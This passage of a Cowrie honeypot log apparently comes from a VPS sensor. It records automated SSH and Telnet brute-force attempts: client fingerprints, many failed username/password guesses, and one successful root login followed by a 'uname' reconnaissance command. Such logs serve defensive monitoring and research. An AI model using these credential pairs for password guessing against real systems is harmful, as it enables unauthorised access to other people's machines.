384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:22:09.614363Z","src_ip":"185.93.89.7","session":"83036f705104"}
{"eventid":"cowrie.login.failed","username":"index","password":"q1w2e3r4","message":"login attempt [index/q1w2e3r4] failed","sensor":"my-vps","timestamp":"2025-08-28T09:22:09.675071Z","src_ip":"185.93.89.7","session":"83036f705104"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":59268,"dst_ip":"1.2.3.4","dst_port":22,"session":"1342fc089b9a","protocol":"ssh","message":"New connection: 193.32.162.145:59268 (1.2.3.4:22) [session: 1342fc089b9a]","sensor":"my-vps","timestamp":"2025-08-28T09:22:09.766208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:22:09.766958Z","src_ip":"193.32.162.145","session":"1342fc089b9a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T09:22:09.797618Z","src_ip":"193.32.162.145","session":"1342fc089b9a"}
{"eventid":"cowrie.login.failed","username":"trader","password":"trader","message":"login attempt [trader/trader] failed","sensor":"my-vps","timestamp":"2025-08-28T09:22:09.892143Z","src_ip":"193.32.162.145","session":"1342fc089b9a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:22:10.702754Z","src_ip":"185.93.89.7","session":"83036f705104"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:22:10.925280Z","src_ip":"193.32.162.145","session":"1342fc089b9a"}
{"eventid":"cowrie.session.closed","duration":30.784377336502075,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:22:18.425462Z","src_ip":"212.227.235.229","session":"cd5ecbb5efb7"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":44904,"dst_ip":"1.2.3.4","dst_port":22,"session":"39847b7073fb","protocol":"ssh","message":"New connection: 51.79.164.132:44904 (1.2.3.4:22) [session: 39847b7073fb]","sensor":"my-vps","timestamp":"2025-08-28T09:22:24.826865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:22:24.950872Z","src_ip":"51.79.164.132","session":"39847b7073fb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:22:25.466017Z","src_ip":"51.79.164.132","session":"39847b7073fb"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-28T09:22:26.756393Z","src_ip":"51.79.164.132","session":"39847b7073fb"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:22:28.310179Z","src_ip":"51.79.164.132","session":"39847b7073fb"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":48422,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b5408a51759","protocol":"ssh","message":"New connection: 185.93.89.7:48422 (1.2.3.4:22) [session: 9b5408a51759]","sensor":"my-vps","timestamp":"2025-08-28T09:22:34.843155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:22:34.843825Z","src_ip":"185.93.89.7","session":"9b5408a51759"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:22:34.861732Z","src_ip":"185.93.89.7","session":"9b5408a51759"}
{"eventid":"cowrie.login.failed","username":"index","password":"112233","message":"login attempt [index/112233] failed","sensor":"my-vps","timestamp":"2025-08-28T09:22:34.900597Z","src_ip":"185.93.89.7","session":"9b5408a51759"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:22:35.990920Z","src_ip":"185.93.89.7","session":"9b5408a51759"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":53126,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec56b3c50b14","protocol":"ssh","message":"New connection: 51.79.164.132:53126 (1.2.3.4:22) [session: ec56b3c50b14]","sensor":"my-vps","timestamp":"2025-08-28T09:22:50.746963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:22:50.891892Z","src_ip":"51.79.164.132","session":"ec56b3c50b14"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:22:51.397220Z","src_ip":"51.79.164.132","session":"ec56b3c50b14"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:22:52.832657Z","src_ip":"51.79.164.132","session":"ec56b3c50b14"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:22:54.326404Z","src_ip":"51.79.164.132","session":"ec56b3c50b14"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":35342,"dst_ip":"1.2.3.4","dst_port":22,"session":"6426cfb200ab","protocol":"ssh","message":"New connection: 185.93.89.7:35342 (1.2.3.4:22) [session: 6426cfb200ab]","sensor":"my-vps","timestamp":"2025-08-28T09:22:59.922000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:22:59.922823Z","src_ip":"185.93.89.7","session":"6426cfb200ab"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:22:59.942042Z","src_ip":"185.93.89.7","session":"6426cfb200ab"}
{"eventid":"cowrie.login.failed","username":"index","password":"qazwsx","message":"login attempt [index/qazwsx] failed","sensor":"my-vps","timestamp":"2025-08-28T09:22:59.979400Z","src_ip":"185.93.89.7","session":"6426cfb200ab"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:23:00.999289Z","src_ip":"185.93.89.7","session":"6426cfb200ab"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":58046,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ec8cc094573","protocol":"ssh","message":"New connection: 51.79.164.132:58046 (1.2.3.4:22) [session: 4ec8cc094573]","sensor":"my-vps","timestamp":"2025-08-28T09:23:16.929108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:23:17.056948Z","src_ip":"51.79.164.132","session":"4ec8cc094573"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:23:17.389860Z","src_ip":"51.79.164.132","session":"4ec8cc094573"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:23:18.949986Z","src_ip":"51.79.164.132","session":"4ec8cc094573"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:23:20.540555Z","src_ip":"51.79.164.132","session":"4ec8cc094573"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":35068,"dst_ip":"1.2.3.4","dst_port":22,"session":"36e317f033ea","protocol":"ssh","message":"New connection: 185.93.89.7:35068 (1.2.3.4:22) [session: 36e317f033ea]","sensor":"my-vps","timestamp":"2025-08-28T09:23:23.782830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:23:23.792763Z","src_ip":"185.93.89.7","session":"36e317f033ea"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:23:23.810085Z","src_ip":"185.93.89.7","session":"36e317f033ea"}
{"eventid":"cowrie.login.failed","username":"index","password":"555555","message":"login attempt [index/555555] failed","sensor":"my-vps","timestamp":"2025-08-28T09:23:23.873652Z","src_ip":"185.93.89.7","session":"36e317f033ea"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:23:24.897646Z","src_ip":"185.93.89.7","session":"36e317f033ea"}
{"eventid":"cowrie.session.connect","src_ip":"60.248.136.162","src_port":38963,"dst_ip":"1.2.3.4","dst_port":23,"session":"9735d5cd18c3","protocol":"telnet","message":"New connection: 60.248.136.162:38963 (1.2.3.4:23) [session: 9735d5cd18c3]","sensor":"my-vps","timestamp":"2025-08-28T09:23:31.900285Z"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":40934,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5c9725a2577","protocol":"ssh","message":"New connection: 51.79.164.132:40934 (1.2.3.4:22) [session: f5c9725a2577]","sensor":"my-vps","timestamp":"2025-08-28T09:23:43.282264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:23:43.407854Z","src_ip":"51.79.164.132","session":"f5c9725a2577"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:23:43.837373Z","src_ip":"51.79.164.132","session":"f5c9725a2577"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:23:45.335280Z","src_ip":"51.79.164.132","session":"f5c9725a2577"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:23:45.949342Z","src_ip":"51.79.164.132","session":"f5c9725a2577"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:23:45.950357Z","src_ip":"51.79.164.132","session":"f5c9725a2577"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58208,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3a71f18e73a","protocol":"ssh","message":"New connection: 217.72.205.35:58208 (1.2.3.4:22) [session: a3a71f18e73a]","sensor":"my-vps","timestamp":"2025-08-28T09:23:46.322785Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:23:46.323980Z","src_ip":"217.72.205.35","session":"a3a71f18e73a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:23:46.563258Z","src_ip":"51.79.164.132","session":"f5c9725a2577"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:23:46.564428Z","src_ip":"51.79.164.132","session":"f5c9725a2577"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":53016,"dst_ip":"1.2.3.4","dst_port":22,"session":"179241bcfa96","protocol":"ssh","message":"New connection: 185.93.89.7:53016 (1.2.3.4:22) [session: 179241bcfa96]","sensor":"my-vps","timestamp":"2025-08-28T09:23:48.015266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:23:48.417711Z","src_ip":"185.93.89.7","session":"179241bcfa96"}
